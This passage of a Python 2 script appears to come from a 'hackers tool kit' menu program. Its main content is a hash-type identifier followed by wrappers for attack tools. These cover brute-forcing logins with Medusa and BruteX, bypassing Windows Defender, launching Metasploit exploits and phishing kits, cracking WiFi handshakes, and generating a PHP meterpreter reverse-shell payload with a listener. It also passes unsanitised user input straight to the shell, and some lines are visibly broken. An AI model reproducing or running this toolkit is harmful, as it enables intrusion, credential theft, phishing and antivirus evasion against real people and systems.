hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + +#ABOUT ME / THE CREATOR START# +#----------------------------# +def about(): + print "\033[92m------------------------------------------------------------" + print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" + print "------------------------------------------------------------" + print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" + print "------------------------------------------------------------" + print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" + print "------------------------------------------------------------" + print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" + print "------------------------------------------------------------\033[0m" +#--------------------------# +#ABOUT ME / THE CREATOR END# + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#CLEAR ALL START# +#---------------# +def clearall(): + os.system("clear") +#-------------# +#CLEAR ALL END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file [y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#REFRESH BANNER START# +#--------------------# +def banner(): + os.system("clear") + mainbanner() +#------------------# +#REFRESH BANNER END# + + +#PHP PAYLOAD START# +#-----------------# +def phpload(): + #msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.20 LPORT=443 -o /root/phphack.php# + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) + os.system(a) + print "\nwould you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> phpload.rc') + os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') + os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) + os.system('echo "exploit\n" >> phpload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r phpload.rc') + os.system('rm -rf phpload.rc') + if yn == "n": + os.system('echo " "') +#---------------# +#PHP PAYLOAD END# + + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE 